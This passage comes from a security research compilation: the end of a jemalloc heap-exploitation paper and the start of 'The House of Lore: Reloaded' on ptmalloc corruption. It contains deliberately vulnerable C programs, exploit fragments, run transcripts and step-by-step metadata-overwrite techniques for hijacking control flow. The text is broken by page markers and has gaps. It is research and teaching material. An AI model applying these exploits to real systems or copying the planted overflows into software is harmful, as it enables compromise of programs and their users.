Part [3-10] is where the actual overflow takes place and part [3-11]
calls 'free()' on one of the regions of the newly allocated arena. Before
explaining the rest of the vulnerable code, let's see what's going on when
'free()' gets called on a memory region.
void
free(void *ptr)
{
...
if (ptr != NULL) {
...
idalloc(ptr);
}
}
Page
41
[
1. Pseudomonarchia jemallocum – argp, huku]
huge_dalloc(ptr);
}
static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
malloc_spin_lock(&arena->lock);
Page
42
[
1. Pseudomonarchia jemallocum – argp, huku]
...
...
arena_run_dalloc(arena, (arena_run_t *)ptr, true);
malloc_spin_unlock(&arena->lock);
}
There are two important things to notice in the snippet above. The first
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
to the start of the memory region to be free()'ed while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region to be given out to the user may start
at 0x28201030 mainly because of the overhead involving the metadata of
chunk, arena and run headers as well as their bitmaps. A careful reader
may notice that 0x28201030 is more than a page far from the start
of the chunk, so, 'pageind' is larger or equal to 1. It is for this
purpose that we are mostly interested in overwriting 'chunk->map[1]'
and not 'chunk->map[0]'. The second thing to catch our attention is
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
element of the overwritten bitmap. This size is later converted to the
number of pages comprising it, so, the attacker can directly affect the
number of pages to be marked as free. Let's see 'arena_run_dalloc':
static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
arena_chunk_t *chunk;
size_t size, run_ind, run_pages;
...
chunk->ndirty += run_pages;
arena->ndirty += run_pages;
}
else {
Page
43
[
1. Pseudomonarchia jemallocum – argp, huku]
...
}
chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
PAGE_MASK);
chunk->map[run_ind+run_pages-1].bits = size |
(chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
...
}
Continuing with our analysis, one can see that at [3-20] the same
size that was calculated in 'arena_dalloc_large()' is now converted
to a number of pages and then all 'map[]' elements that correspond to
these pages are marked as dirty (notice that 'dirty' argument given
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
true). The rest of the 'arena_run_dalloc()' code, which is not shown
here, is responsible for forward and backward coalescing of dirty
pages. Although not directly relevant for our demonstration, it's
something that an attacker should keep in mind while developing a real
life reliable exploit.
Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted in the given arena's red black tree. This can be
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
may think that since red-black trees are involved in jemalloc, she can
abuse their pointer arithmetics to achieve a '4bytes anywhere' write
primitive. We urge all interested readers to have a look at rb.h, the
file that contains the macro-based red black tree implementation used
by jemalloc (WARNING: don't try this while sober).
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.
3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.
Page
44
[
1. Pseudomonarchia jemallocum – argp, huku]
The exploit code for the vulnerable program presented in this section
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
the offsets of the metadata may vary for your platform. Given the address
of an existing arena (arena A of step 2), it creates a file that contains
the exploitation vector. This file should be passed as argument to the
vulnerable target (full code in file exploit-chunk.c):
if(argc != 2) {
fprintf(stderr, "%s <arena>\n", argv[0]);
return 0;
}
memset(buffer, 0, sizeof(buffer));
p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;
/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);
p += 32;
It is now time for some action. First, let's compile and run the vulnerable
code.
$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Page
45
[
1. Pseudomonarchia jemallocum – argp, huku]
The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.
$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
2) Overwrite of the run metadata (in case the overflown region is the
last in a run).
3) Overwrite of the arena chunk metadata (in case the overflown region
is the last in a chunk).
That said we believe we have covered most of the cases that an attacker
may encounter. Feel free to contact us if you think we have missed
something important.
Page
46
[
1. Pseudomonarchia jemallocum – argp, huku]
mag_rack_t *
mag_rack_create(arena_t *arena)
{
...
return (arena_malloc_small(arena, sizeof(mag_rack_t) +
(sizeof(bin_mags_t) * (nbins - 1)), true));
}
A size of 240 is actually serviced by the bin holding regions of 256 bytes.
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
region physically bordering a 'mag_rack_t'. The following vulnerable code
emulates this situation (file vuln-mag.c):
if(arg)
strcpy(v, (char *)arg);
return NULL;
}
if(argc != 3) {
printf("%s <thread_count> <buff>\n", argv[0]);
Page
47
[
1. Pseudomonarchia jemallocum – argp, huku]
return 0;
}
tcount = atoi(argv[1]);
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
pthread_join(vid, NULL);
for(i = 0; i < tcount; i++)
pthread_join(tid[i], NULL);
pthread_exit(NULL);
}
if(argc != 2) {
printf("%s <mag_t address>\n", argv[0]);
return 1;
}
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
Page
48
[
1. Pseudomonarchia jemallocum – argp, huku]
*/
printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
*(size_t *)&fake_mag_t[0] = 0x42424242;
*(size_t *)&fake_mag_t[4] = 0xffffffff;
*(size_t *)&fake_mag_t[8] = 0x41414141;
fake_mag_t[12] = 0;
setenv("FAKE_MAG_T", fake_mag_t, 1);
$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...
$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47
Neat. One of the victim threads, the one whose magazine rack is overflown,
returns an arbitrary address as a valid region. Overwriting the thread
caches is probably the most lethal attack but it suffers from a limitation
which we do not consider serious. The fact that the returned memory region
and the 'bin_mags[]' element both receive arbitrary addresses, results in a
segfault either on the deallocation of 'p2' or once the thread dies by
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
should be triggered _before_ the thread exits or the memory region is
freed. Fair enough... :)
Page
49
[
1. Pseudomonarchia jemallocum – argp, huku]
For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.
This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red black trees used by jemalloc for housekeeping. The rbtree
implementation (defined in rb.h) is fully based on preprocessor macros
and it's quite complex in nature. Although we have already debugged them,
due to lack of time we didn't attempt to exploit the various tree
operations performed on rbtrees. We wish that someone will continue our
work from where we left of. If no one does, then you definitely know whose
articles you'll soon be reading :)
--[ 6 - Conclusion
Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.
Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.
--[ 7 - References
Page
50
[
1. Pseudomonarchia jemallocum – argp, huku]
- http://vreugdenhilresearch.nl
/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
[UJEM] unmask_jemalloc
- https://github.com/argp/unmask_jemalloc
Page
51
[2. The House Of Lore: Reloaded - blackngel]
|=-----------------------------------------------------------------------=|
|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by blackngel ]=-------------------------=|
|=-----------------------------------------------------------------------=|
^^
*`* @@ *`* HACK THE WORLD
* *--* *
## <[email protected]>
|| <[email protected]>
* *
* * (C) Copyleft 2010 everybody
_* *_
--[ CONTENTS
1 - Preface
2 - Introduction
4 - Analysis of Ptmalloc3
4.3.2 - dnmalloc
6 - Conclusions
7 - Acknowledgments
Page
53
[2. The House Of Lore: Reloaded - blackngel]
8 - References
9 - Wargame Code
.-----------.
---[ 1 ---[ Preface ]---
.-----------.
No offense, I could say that sometimes the world of hackers (at least) is
divided into two camps:
1.- The illustrious characters who spend many hours to find holes in
the current software.
2.- And the hackers who spend most of their time to find a way to
exploit a vulnerable code/environment that does not exist yet.
Maybe, it is a bit confusing but this is like the early question: which
came first, the chicken or the egg? Or better... Which came first, the bug
or the exploit?
Unlike what happens with an ordinary Heap Overflow, where we could say it's
the logical progression over time of a Stack Overflow, with The House of
Lore technique seems to happen something special and strange, we know it's
there (a thorn in your mind), that something happens, something is wrong
and that we can exploit it.
But we do not know how to do it. And that is all over this stuff, we know
the technique (at least the Phantasmal Phantasmagoria explanation), but
perhaps has anyone seen a sample vulnerable code that can be exploited?
3.- What are the names of those sequences? Are the sequences a bug or
is it pure luck?
This can give much food for thought. If Phantasmal had left a clear
evidence of his theory, surely we would have forgotten about it, but as
this did not happened, some of us are spending all day analyzing the way to
create a code that can be committed with a technique that a virtual expert
gave us in 2005 in a magnificent article that everyone already knows,
right?
We speak about "Malloc Maleficarum" [1], great theory that I myself had the
opportunity to demonstrate in practice in the "Malloc Des-Maleficarum" [2]
article. But unfortunately I left a job unresolved yet. In the pas I was
not able to interpret so correct one of the techniques that were presented
by Phantasmal, we speak of course of "The House of Lore" technique, but in
a moment of creativity it seems that I finally found a solution.
Page
54
[2. The House Of Lore: Reloaded - blackngel]
Here I submit the details of how a vulnerable code can be attacked with The
House of Lore (THoL from now), thus completing a stage that for some reason
was left unfinished.
In addition, we will target not only the smallbin corruption method which
many have heard of, but we also introduce the complications in largebin
method and how to solve them. I also present two variants based on these
techniques that I have found to corrupt the Ptmalloc3 structure.
There are also more content in this paper like a small program where to
apply one of the techniques can be exploited, it is very useful for an
exploiting-wargame.
And... yes, THoL was exactly the thorn that I had into my mind.
[ Victor Hugo ]
.----------------.
---[ 2 ---[ Introduction ]---
.----------------.
We mention that dynamic hooks could be a better way to this goal. More
control, more conspicuous.
[ Albert Einstein ]
.-----------------------.
---[ 2.1 ---[ KiddieDbg Ptmalloc2 ]---
.-----------------------.
In an effort to make things easier to the reader when we will perform all
subsequent tests, let's indicate the simple way you can use PTMALLOC2 to
obtain the necessary information from within each attack.
To avoid the tedious task of recompiling GLIBC when one makes a minor
change in "malloc.c", we decided to directly download the sources of
ptmalloc2 from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.
Page
55
[2. The House Of Lore: Reloaded - blackngel]
great effort to type a make) and you can directly link it as a static
library to each of our examples like this:
And now, enough jokes, here are the small changes in "malloc.c" to get some
information at runtime:
Void_t*
_int_malloc(mstate av, size_t bytes)
{
....
checked_request2size(bytes, nb);
if (in_smallbin_range(nb)) {
idx = smallbin_index(nb);
bin = bin_at(av,idx);
if ( (victim = last(bin)) != bin) {
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
}
}
Here we can know when a chunk is extracted from its corresponding bin to
satisfy a memory request of appropriate size. In addition, we can control
the pointer value that takes the "bk" pointer of a chunk if it has been
Page
56
[2. The House Of Lore: Reloaded - blackngel]
previously altered.
use_top:
victim = av->top;
size = chunksize(victim);
bck = unsorted_chunks(av);
fwd = bck->fd;
p->bk = bck;
p->fd = fwd;
bck->fd = p;
fwd->bk = p;
printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);
Unlike the first two changes which were introduced in the "_int_malloc( )"
function, the latter did it in "_int_free( )" and clearly indicates when a
chunk has been freed and introduced into the unsorted bin for a further use
of it.
[ Galileo Galilei ]
.-----------------------.
---[ 2.2 ---[ SmallBin Corruption ]---
.-----------------------.
Take again before starting the piece of code that will trigger the
vulnerability described in this paper:
if (in_smallbin_range(nb)) {
Page
57
[2. The House Of Lore: Reloaded - blackngel]
idx = smallbin_index(nb);
bin = bin_at(av,idx);
if ( (victim = last(bin)) != bin) {
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
To reach this area of the code inside "_int_malloc( )", one assumes the
fact that the size of memory request is largest that the current value of
"av->max_fast" in order to pass the first check and avoid fastbin[ ]
utilization. Remember that this value is "72" by default.
We know from the documentation that: "the size bins for less than 512 bytes
contain always the same size chunks". With this we know that if a chunk of
a certain size has been introduced in its corresponding bin, a further
request of the same size will find the appropriate bin and will return the
previously stored chunk. The functions "smallbin_index(nb)" and
"bin_at(av, idx)" are responsible for finding the appropriate bin for the
chunk requested.
We also know that a "bin" is a couple of pointers "fd" and "bk", the
purpose of the pointers is to close the doubly linked list of the free
chunks. The macro "last(bin)" returns the pointer "bk" of this "fake
chunk", it also indicates the last available chunk in the bin (if any). If
none exists, the pointer "bin->bk" would be pointing to itself, then it
will fail the search and it would be out of the smallbin code.
If all is correct, the user is given the pointer *mem of victim by the
macro "chunk2mem(victim)."
Page
58
[2. The House Of Lore: Reloaded - blackngel]
The only extra tasks in this process are to set the PREV_INUSE bit of the
contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is
not in the main arena by default.
The only value that someone can control in this whole process is obviously
the value of "victim->bk". But to accomplish this, a necessary condition
must be satisfied:
1 - That two chunks have been allocated previously, that the latter has
been freed and that the first will be vulnerable to an overflow.
If this is true, the overflow of the first chunk will allow to manipulate
the header of the already freed second chunk, specifically the "bk" pointer
because other fields are not interesting at this time. Always remember that
the overflow must always occur after the release of this second piece, and
I insist on it because we do not want to blow the alarms within
"_int_free()" before its time.
In this attack one must be careful with the sentence "bck->fd = bin" since
this code tries to write to the pointer "fd" the bin's address to close the
linked list, this memory area must have writing permissions.
The only last thing really important for the success of our attack:
When a chunk is freed, it is inserted into the known "unsorted bin". This
is a special bin, also a doubly linked list, with the peculiarity that the
chunks are not sorted (obviously) according to the size. This bin is like a
stack, the chunks are placed in this bin when they are freed and the chunks
will always been inserted in the first position.
bck = victim->bk
Page
59
[2. The House Of Lore: Reloaded - blackngel]
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
which is the same as saying: the bin points to the penultimate chunk, and
the penultimate chunk points to the bin which becomes the latest chunk in
the list.
Once removed from the list, two things can happen. Either the size of the
removed chunk matches with the request made (size == nb) in which case it
returns the memory for this chunk to the user, or it does not coincide and
that's when we proceed to introduce the chunk in the adequate bin with:
Why do we mention this? Well, the condition that we mentioned requires that
the freed and manipulated chunk will be introduced in its appropriate bin,
since as Phantasmal said, altering an unsorted chunk is not interesting at
this time.
With this in mind, our vulnerable program should call malloc( ) between the
vulnerable copy function and the subsequent call to malloc( ) requesting
the same size as the chunk recently freed. In addition, this intermediate
call to malloc( ) should request a size larger than the released one, so
that the request can not be served from unsorted list of chunks and
proceeds to order the pieces into their respective bins.
Page
60
[2. The House Of Lore: Reloaded - blackngel]
Page
61
[2. The House Of Lore: Reloaded - blackngel]
It is where the pointer "*mem" is returned pointing to the stack and thus
giving full control of the attacked system. However as there are people who
need to see to believe, read on next section.
Note: I have not checked all versions of glibc, and some changes have been
made since I wrote this paper. For example, on an Ubuntu box (with glibc
2.11.1) we see the next fix:
bck = victim->bk;
if (__builtin_expect (bck->fd != victim, 0))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;
This check can still be overcome if you control an area into the stack and
you can write an integer such that its value is equal to the address of the
recently free chunk (victim). This must happen before the next call to
malloc( ) with the same size requested.
[ Albert Einstein ]
.-------------------------.
---[ 2.2.1 ---[ Triggering The HoL(e) ]---
.-------------------------.
Page
62
[2. The House Of Lore: Reloaded - blackngel]
detailed description:
#include <stdio.h>
#include <string.h>
void evil_func(void)
{
printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it.\n");
}
void func1(void)
{
char *lb1, *lb2;
malloc(4056);
buff1 = (char *) malloc(16);
printf("\nBuff1 -> [ %p ]", buff1);
buff2 = (char *) malloc(128);
printf("\nBuff2 -> [ %p ]", buff2);
buff3 = (char *) malloc(256);
printf("\nBuff3 -> [ %p ]\n", buff3);
free(buff2);
strcpy(buff1, argv[1]);
func1();
return 0;
}
Page
63
[2. The House Of Lore: Reloaded - blackngel]
2) We allocate three chunks of memory, 16, 128 and 256 bytes respectively,
since no chunks has been released before, we know that they must been
taken from the Wilderness or Top Chunk.
3) Free() the second chunk of 128 bytes. This is placed in the unsorted
bin.
4) Allocate a fourth piece larger than the most recently freed chunk. The
"buff2" is now extracted from the unsorted list and added to its
appropriate bin.
6) We call func1( ) which allocated two blocks of 128 bytes (the same size
as the piece previously released) to formulate a question and get a user
response.
We can see that the first 3 malloced chunks are taken from the TOP, then
the second chunk (0x0804fff8) is passed to free() and placed in the
unsorted bin. This piece will remain here until the next call to malloc( )
will indicate whether it can meet the demand or not.
Since the allocated fourth buffer is larger than the recently freed, it's
taken again from TOP, and buff2 is extracted from unsorted bin to insert it
into the bin corresponding to its size (128).
After we see how the next call to malloc(128) (lb1) triggers smallbin code
returning the same address that the buffer previously freed. You can see
the value of "victim->bk" which is what should take (lb2) after this
Page
64
[2. The House Of Lore: Reloaded - blackngel]
However, we can see in the output: the lb2 is taken from the TOP and not
from a smallbin. Why? Simple, we've just released a chunk (only had a piece
in the corresponding bin to the size of this piece) and since we have not
altered the "bk" pointer of the piece released, the next check:
will say that the last piece in the bin points to the bin itself, and
therefore, the allocation must be extracted from another place.
Until here all right, then, what do we need to exploit the program?
2) This address, in turn, must fall on a site such that the "bk" pointer of
this fake chunk will be an address with write permissions.
3) The evil_func()'s address with which we want to overwrite EIP and the
necessary padding to achieve the return address.
But the important thing here is that we must alter buff2->bk with the
"0xbffff33c" value so the new victim->bk take a writable address.
And now, without further delay, let's see what happens when we merge all
these elements into a single attack:
Page
65
[2. The House Of Lore: Reloaded - blackngel]
...
This is an evil function. You become a cool hacker if you are able to
execute it. // We get a cool msg.
Compile this example with normal GLIBC and you will get the same result,
only remember adjusting evil_func( ) address or the area where you have
stored your custom arbitrary code.
[ Socrates ]
.----------------------------.
---[ 2.2.2 ---[ A More Confusing Example ]---
.----------------------------.
This is a crude imitation of an agent manager. The only thing this program
Page
66
[2. The House Of Lore: Reloaded - blackngel]
can do is creating a new agent, editing it (ie edit their names and
descriptions) or deleting it. To save space, one could edit only certain
fields of an agent, leaving the other free without taking up memory or
freeing when no longer needed.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void main_menu(void);
void create_agent(void);
void select_agent(void);
void edit_agent(void);
void delete_agent(void);
void edit_name(void);
void edit_lastname(void);
void edit_desc(void);
void delete_name(void);
void delete_lastname(void);
void delete_desc(void);
void show_data_agent(void);
agent_t *agents[256];
int agent_count = 0;
int sel_ag = 0;
void main_menu(void)
{
int op = 0;
char opt[2];
op = atoi(opt);
Page
67
[2. The House Of Lore: Reloaded - blackngel]
switch (op) {
case 1:
create_agent();
break;
case 2:
select_agent();
break;
case 3:
show_data_agent();
break;
case 4:
edit_agent();
break;
case 0:
exit(0);
default:
break;
}
main_menu();
}
void create_agent(void)
{
agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
sel_ag = agent_count;
agents[agent_count]->id = agent_count;
agents[agent_count]->name = NULL;
agents[agent_count]->lastname = NULL;
agents[agent_count]->desc = NULL;
printf("\nAgent %d created, now you can edit it", sel_ag);
agent_count += 1;
}
void select_agent(void)
{
char ag_num[2];
int num;
void show_data_agent(void)
{
printf("\nAgent [%d]", agents[sel_ag]->id);
printf("\nName: ");
if(agents[sel_ag]->name != NULL)
printf("%s", agents[sel_ag]->name);
printf("\nLastname: ");
Page
68
[2. The House Of Lore: Reloaded - blackngel]
if(agents[sel_ag]->lastname != NULL)
printf("%s", agents[sel_ag]->lastname);
printf("\nDescription: ");
if(agents[sel_ag]->desc != NULL)
printf("%s", agents[sel_ag]->desc);
}
void edit_agent(void)
{
int op = 0;
char opt[2];
op = atoi(opt);
switch (op) {
case 1:
edit_name();
break;
case 2:
edit_lastname();
break;
case 3:
edit_desc();
break;
case 4:
delete_name();
break;
case 5:
delete_lastname();
break;
case 6:
delete_desc();
break;
case 7:
delete_agent();
break;
case 0:
main_menu();
default:
break;
}
edit_agent();
}
void edit_name(void)
{
if(agents[sel_ag]->name == NULL) {
agents[sel_ag]->name = (char *) malloc(32);
Page
69
[2. The House Of Lore: Reloaded - blackngel]
void delete_name(void)
{
if(agents[sel_ag]->name != NULL) {
free(agents[sel_ag]->name);
agents[sel_ag]->name = NULL;
}
}
void edit_lastname(void)
{
if(agents[sel_ag]->lastname == NULL) {
agents[sel_ag]->lastname = (char *) malloc(128);
printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
}
void delete_lastname(void)
{
if(agents[sel_ag]->lastname != NULL) {
free(agents[sel_ag]->lastname);
agents[sel_ag]->lastname = NULL;
}
}
void edit_desc(void)
{
if(agents[sel_ag]->desc == NULL) {
agents[sel_ag]->desc = (char *) malloc(256);
printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);
}
void delete_desc(void)
{
if(agents[sel_ag]->desc != NULL) {
free(agents[sel_ag]->desc);
agents[sel_ag]->desc = NULL;
}
}
void delete_agent(void)
{
if (agents[sel_ag] != NULL) {
free(agents[sel_ag]);
agents[sel_ag] = NULL;
Page
70
[2. The House Of Lore: Reloaded - blackngel]
if (sel_ag == 0) {
agent_count = 0;
printf("\n[!] Empty list, please create new agents\n");
} else {
sel_ag -= 1;
agent_count -= 1;
printf("[+] Current agent selection: %d\n", sel_ag);
}
} else {
printf("\n[!] No agents to delete\n");
}
}
This is the perfect program that I would present in a wargame to those who
wish to apply the technique described in this paper.
Another technique that one would take as viable would be The House of Force
since at first it is easy to corrupt the Wilderness (the Top Chunk), but
remember that in order to apply this method one of the requirements is that
the size of a call to malloc( ) must been defined by the designer with the
main goal of corrupting "av->top". This seems impossible here.
Other techniques are also unworkable for several reasons, each due to their
intrinsic requirements. So we must study how to sort the steps that trigger
the vulnerability and the attack process that we have studied so far.
After a quick look, we found that the only vulnerable function is:
void edit_name(void) {
...
agents[sel_ag]->name = (char *) malloc(32);
...
fgets(agents[sel_ag]->name, 322, stdin);
Page
71
[2. The House Of Lore: Reloaded - blackngel]
For this, what we do is create a new agent(1), select the first agent(0)
and delete its field "lastname", select the second agent(1) and edit its
description. This is equal to:
After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
will have been placed in its corresponding bin. Now we can alter "bk"
pointer of this chunk, and for this we select again the first agent(0) and
edit its name (here there will be no call to malloc( ) since it has been
previously assigned).
At this time, we can place a proper memory address pointing to the stack
and make two calls to malloc(128), first editing the "lastname" field of
the second agent(1) and then editing the "lastname" field of agent(0) one
more time.
These latest actions should return a memory pointer located in the stack in
a position of your choice, and any written content on "agents[0]->lastname"
could corrupt a saved return address.
Without wishing to dwell too much more, we show here how a tiny-exploit
alter the above pointer "bk" and returns a chunk of memory located in the
stack:
#!/usr/bin/perl
Page
72
[2. The House Of Lore: Reloaded - blackngel]
And here is the result, displaying only the outputs of interest for us:
.....
.....
.....
.....
.....
.....
.....
Page
73
[2. The House Of Lore: Reloaded - blackngel]
.....
.....
.....
.....
.....
.....
Everyone can predict what happened in the end, but GDB can clarify for us a
few things:
Page
74
[2. The House Of Lore: Reloaded - blackngel]
And you have moved to the next level of your favorite wargame, or at least
you have increased your level of knowledge and skills.
Now, I encourage you to compile this program with your regular glibc (not
static Ptmalloc2), and verify that the result is exactly the same, it does
not change the inside code.
I don't know if anyone had noticed, but another of the techniques that in
principle could be applied to this case is the forgotten The House of
Prime. The requirement for implementing it is the manipulation of the
header of two chunks that will be freed. This is possible since an overflow
in agents[]->name can override both agents[]->lastname and agents[]->desc,
and we can decide both when freeing them and in what order. However, The
House of Prime needs also at least the possibility of placing an integer
on the stack to overcome a last check and this is where it seems that we
stay trapped. Also, remember that since glibc 2.3.6 one can no longer pass
to free( ) a chunk smaller than 16 bytes whereas this is the first
requirement inherent to this technique (alter the size field of the first
piece overwritten 0x9h = 0x8h + PREV_INUSE bit).
[ Franklin D. Roosevelt ]
.------------------------------.
---[ 3 ---[ LargeBin Corruption Method ]---
.------------------------------.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
Page
75
[2. The House Of Lore: Reloaded - blackngel]
void evil_func(void)
{
printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it\n");
}
void func1(void)
{
char *lb1, *lb2;
malloc(4096);
buff1 = (char *) malloc(1024);
printf("\nBuff1 -> [ %p ]", buff1);
buff2 = (char *) malloc(2048);
printf("\nBuff2 -> [ %p ]", buff2);
buff3 = (char *) malloc(4096);
printf("\nBuff3 -> [ %p ]\n", buff3);
free(buff2);
strcpy(buff1, argv[1]);
func1();
return 0;
}
As you can see, we still need an extra reserve (buff4) after releasing the
second allocated chunk. This is because it's not a good idea to have a
corrupted "bk" pointer in a chunk that still is in the unsorted bin. When
it happens, the program usually breaks sooner or later in the instructions:
But if we do not make anything wrong before the recently freed chunk is
placed in its corresponding bin, then we pass without penalty or glory the
next area code:
Page
76
[2. The House Of Lore: Reloaded - blackngel]
Having passed this code means that (buff2) has been introduced in its
corresponding largebin. Therefore we will reach this code:
if (!in_smallbin_range(nb)) {
bin = bin_at(av, idx);
This does not look good. The unlink( ) macro is called, and we know the
associated protection since the 2.3.6 version of Glibc. Going there would
destroy all the work done until now.
Here comes one of the first differences in the largebin corruption method.
In 2.2.1 we said that after overwriting the "bk" pointer of the free( )
chunk, two calls to malloc( ) with the same size should be carried out to
return a pointer *mem in an arbitrary memory address.
In largebin corruption, we must avoid this code at all cost. For this, the
two calls to malloc( ) must be less than buff2->size. Phantasmal told us
"512 < M < N", and that is what we see in our vulnerable application:
512 < 1536 < 2048.
As it has not previously been freed any chunk of this size (1536) or at
least belonging to the same bin, "_int_malloc( )" tries to search a chunk
that can fulfill the request from the next bin to the recently scanned:
// Search for a chunk by scanning bins, starting with next largest bin.
++idx;
bin = bin_at(av,idx);
And here is where the magic comes, the following piece of code will be
executed:
victim = last(bin);
.....
Page
77
[2. The House Of Lore: Reloaded - blackngel]
else {
size = chunksize(victim);
/* unlink */
bck = victim->bk;
bin->bk = bck;
bck->fd = bin;
/* Exhaust */
if (remainder_size < MINSIZE) {
printf("\n[PTMALLOC2] -> Exhaust code!! You win!\n");
.....
return chunk2mem(victim);
}
/* Split */
else {
.....
set_foot(remainder, remainder_size);
check_malloced_chunk(av, victim, nb);
return chunk2mem(victim);
}
}
The code has been properly trimmed to show only the parts that have
relevance in the method we are describing. Calls to printf( ) are of my own
and you will soon see its usefulness.
Also it's easy to see that the process is practically the same as in the
smallbin code. You take the last chunk of the respective largebin
(last(bin)) in "victim" and proceed to unlink it (without macro) before
reaching the user control. Since we control "victim->bk", at first the
attack requirements are the same, but then, where is the difference?
Page
78
[2. The House Of Lore: Reloaded - blackngel]
The only possibility that remains then is that the vulnerable application
allows us to insert null bytes in the attack string, and therefore to
supply a value as (0x00000610 = 1552) that would generate:
1552 - 1544 (align) = 8 and the condition would be fulfilled. Let us see in
action:
Perfect, we reached the second memory request where we saw that victim is
equal to 0xbffff044 which being returned would provide a chunk whose *mem
pointes to the stack. However set_foot( ) again gives us problems, and this
is obviously because we are not controlling the "size" field of this fake
chunk created on the stack.
This is where we have to overcome the latter condition. Victim should point
to a memory location containing user-controlled data, so that we can enter
Page
79
[2. The House Of Lore: Reloaded - blackngel]
We end this section by saying that the largebin corruption method is not
just pure fantasy as we've made it a reality. However it is true that
finding the required preconditions of attack in real-life applications is
almost impossible.
Note: Again we have not tested all versions of glibc, but we noted the
following fixes in advanced versions:
else {
size = chunksize(victim);
/* unlink */
unlink(victim, bck, fwd);
/* Exhaust */
if (remainder_size < MINSIZE) {
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
}
/* Split */
else {
What this means is that the unlink( ) macro has been newly introduced into
the code, and thus the classic pointer testing mitigate the attack.
[ Albert Einstein ]
.-------------------------.
---[ 4 ---[ Analysis of Ptmalloc3 ]---
.-------------------------.
